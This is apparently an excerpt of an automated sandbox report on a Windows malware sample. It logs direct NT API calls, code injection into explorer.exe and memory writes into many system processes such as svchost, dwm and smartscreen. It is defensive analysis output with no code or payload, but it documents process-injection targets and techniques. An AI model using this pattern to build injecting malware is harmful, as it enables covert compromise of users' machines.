            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtEnumerateValueKey: Direct from: 0x77762BACJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAdjustPrivilegesToken: Direct from: 0x77762EACJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtAllocateVirtualMemory: Direct from: 0x77762B9CJump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 1080000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 2D10000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 2D30000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 2D40000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 2D50000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8880000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8850000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 2F60000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8830000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8860000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8870000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 89A0000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8B10000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8B20000 value: E8Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: PID: 4056 base: 8B30000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B8C0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B8D0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B8E0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B8F0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B900000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B030000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B910000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: B920000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E1D0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E1E0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E1F0000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E200000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E230000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E330000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E210000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E220000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E340000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E350000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E360000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E400000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E410000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E420000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E430000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E450000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E460000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E470000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E480000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E490000 value: E8Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: PID: 4056 base: E4A0000 value: E8Jump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 1080000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: BD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: ED0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 120000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C40000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 580000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: DB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2410000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 960000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: BF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 340000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 350000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1490000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2470000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2320000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2930000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2980000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 840000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 890000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2460000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2390000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 23E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2D60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1270000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1280000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2E10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2EB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2450000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 860000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2420000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 25D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2620000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1170000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1180000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2700000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 710000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 760000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2210000Jump to behavior
